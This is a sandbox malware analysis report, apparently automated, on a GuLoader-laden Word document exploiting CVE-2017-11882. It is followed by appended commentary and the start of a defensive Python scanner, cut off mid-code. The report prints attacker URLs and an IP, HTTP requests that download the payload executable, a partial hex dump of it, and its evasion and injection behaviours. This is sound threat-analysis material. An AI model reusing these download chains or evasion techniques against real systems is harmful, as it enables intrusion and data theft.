Windows Analysis Report RFQ with Specification (Fitch Solutions).docx

Overview

General Information

Sample Name: RFQ with Specification (Fitch Solutions).docx
Analysis ID: 531863
MD5: 6f6e82505d97090f456dcd944678670d
SHA1: 3e95e486346d44c053ef45748266b3da916110c9
SHA256: 363d7304454fc6f29f8eff497d56470beb41b1d7a013ec3ab5b4191847278bd3
Tags: doc

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Contains an external reference to another file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormally high CPU usage
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

AV Detection:

Found malware configuration
Source: 0000000F.00000002.717553624.00000000002E0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=5A"}
Multi AV Scanner detection for submitted file
Source: RFQ with Specification (Fitch Solutions).docx Virustotal: Detection: 27%
Source: RFQ with Specification (Fitch Solutions).docx ReversingLabs: Detection: 15%
Antivirus detection for URL or domain
Source: http://192.3.122.180/1100/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/....wW.........-w-w------W-------Ww-------......Ww......---w.w--wW.W.wbk Virustotal: Detection: 13%
Source: http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/ Virustotal: Detection: 11%
Source: http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/. Virustotal: Detection: 12%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 13%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Rorqu.pdb source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr
Source: C:\Users\Public\vbc.exe Code function: 9_2_00406873 FindFirstFileW,FindClose, 9_2_00406873
Source: C:\Users\Public\vbc.exe Code function: 9_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_00405C49
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040290B FindFirstFileW, 9_2_0040290B

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: onedrive.live.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.122.180:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.3.122.180:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49165 -> 192.3.122.180:80
Source: Traffic Snort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49166 -> 192.3.122.180:80
Source: Traffic Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49167 -> 192.3.122.180:80
Source: Traffic Snort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49167 -> 192.3.122.180:80
Source: Traffic Snort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49168 -> 192.3.122.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://onedrive.live.com/download?cid=5A
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 Dec 2021 12:53:32 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Wed, 01 Dec 2021 09:20:59 GMTETag: "2017a-5d2123122436c"Accept-Ranges: bytesContent-Length: 131450Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 e0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 11 00 00 00 c0 04 00 00 12 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  GET /......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/....wW.........-w-w------W-------Ww-------......Ww......---w.w--wW.W.wbk HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: 192.3.122.180
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /1100/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 192.3.122.180
  Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180 (this entry is repeated 50 times in the report)
Source: ......w_W.....W.........-Ww........-----Www.----............wW--------....wW- on 192.3.122.180.url.0.dr String found in binary or memory: http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/
Source: ....wW.........-w-w------W-------Ww-------......Ww......---w.w--wW.W.wbk.url.0.dr String found in binary or memory: http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/.
Source: Rorqu.exe, 0000000C.00000002.721818430.0000000003C77000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: Rorqu.exe, 0000000C.00000002.721818430.0000000003C77000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000009.00000002.461208677.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000009.00000000.454124922.000000000040A000.00000008.00020000.sdmp, vbc[1].exe.7.dr, vbc.exe.7.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: http://s.symcd.com06
Source: vbc.exe, 00000009.00000002.461452307.0000000001EF0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Rorqu.exe, 0000000C.00000002.721818430.0000000003C77000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Rorqu.exe, 0000000C.00000002.721818430.0000000003C77000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000009.00000002.461452307.0000000001EF0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: Rorqu.exe, 0000000C.00000002.721818430.0000000003C77000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C94CB11B-D1B2-466D-A54A-3B0D7AFF6150}.tmp
Source: unknown DNS traffic detected: queries for: onedrive.live.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 9_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 9_2_004056DE

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Document has an unknown application name
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE indicator application name: unknown
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 9_2_0040352D
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040755C 9_2_0040755C
Source: C:\Users\Public\vbc.exe Code function: 9_2_00406D85 9_2_00406D85
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_00401724 12_2_00401724
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F023F 12_2_002F023F
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F030D 12_2_002F030D
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F0C1D 12_2_002F0C1D
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F6416 12_2_002F6416
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F0385 12_2_002F0385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F309C 15_2_002F309C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002EBD30 15_2_002EBD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F1822 15_2_002F1822
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F1004 15_2_002F1004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F066B 15_2_002F066B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F0EE7 15_2_002F0EE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E8D69 15_2_002E8D69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002EED65 15_2_002EED65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002EFDA7 15_2_002EFDA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F15B8 15_2_002F15B8
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F2A00 NtProtectVirtualMemory, 15_2_002F2A00
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormally high CPU usage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process Stats: CPU usage > 98%
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process Stats: CPU usage > 98%
Document contains no OLE stream with summary information
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE indicator has summary info: false
PE file contains strange resources
Source: Rorqu.exe.9.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 76E90000 page execute and read and write
Source: RFQ with Specification (Fitch Solutions).docx Virustotal: Detection: 27%
Source: RFQ with Specification (Fitch Solutions).docx ReversingLabs: Detection: 15%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\Rorqu.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 9_2_0040352D
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$Q with Specification (Fitch Solutions).docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE761.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winDOCX@10/23@1/1
Source: C:\Users\Public\vbc.exe Code function: 9_2_004021AA CoCreateInstance, 9_2_004021AA
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 9_2_0040498A
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Rorqu.pdb source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 0000000C.00000002.717652799.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.717553624.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.605917089.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F462D push FFFFFF85h; ret 12_2_002F4637
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F4628 push FFFFFF91h; ret 12_2_002F462B
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F4227 push FFFFFF9Eh; ret 12_2_002F41D7
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F1110 push cs; ret 12_2_002F1113
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F415A push FFFFFF9Eh; ret 12_2_002F41D7
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F3856 push edi; retf 12_2_002F3864
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F4F53 pushad ; ret 12_2_002F4F5B
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F30BC pushfd ; iretd 12_2_002F30D4
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F5BB6 push 6AF15976h; retf 12_2_002F5BCF
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F63B0 pushad ; ret 12_2_002F63B3
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F10D6 push FFFFFF9Ah; ret 12_2_002F110F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E3441 push ebp; retf 15_2_002E3444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E1482 push cs; iretd 15_2_002E1483
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E40F6 push esi; iretd 15_2_002E41BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E40D8 push esi; iretd 15_2_002E41BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E596A push edx; ret 15_2_002E596B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E417A push esi; iretd 15_2_002E41BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E3F4C push esi; iretd 15_2_002E41BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E0BD2 pushfd ; iretd 15_2_002E0BD6
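The push/ret pairs above are reported at addresses in the 002Fxxxx (Rorqu.exe) and 002Exxxx (CasPol.exe) ranges, the same 0x2F0000 and 0x2E0000 regions the Yara rule matched and that Rorqu.exe writes into CasPol.exe further down the report, so they sit in the GuLoader shellcode rather than in the host binaries. A `push imm; ret` is an unconditional jump to imm; an immediate such as FFFFFF85h lies outside any 32-bit user-mode range, so such a pair can never execute as a working jump and is more likely data or dead code walked by the disassembler. The scanner below is an added example, not code from the sandbox or from the sample: it finds the same idioms in a raw buffer and triages each hit with that range check. The opcode table, the SAMPLE bytes and the assess() heuristic are this example's own constructions.

```python
"""Scan a raw code/memory buffer for the push ... ; ret idioms that the
"Uses code obfuscation techniques (call, push, ret)" signature reports.
Added example, not part of the sandbox report; the sample bytes below are
constructed to mirror the kinds of pairs listed for Rorqu.exe and CasPol.exe.
"""
import struct

# Opcode -> (mnemonic, immediate size). Only the single-byte forms seen in
# the report are modelled; a real disassembler is needed for full coverage.
PUSH_OPS = {
    0x68: ("push imm32", 4),
    0x6A: ("push imm8", 1),
    0x0E: ("push cs", 0),
    0x60: ("pushad", 0),
    0x9C: ("pushfd", 0),
}
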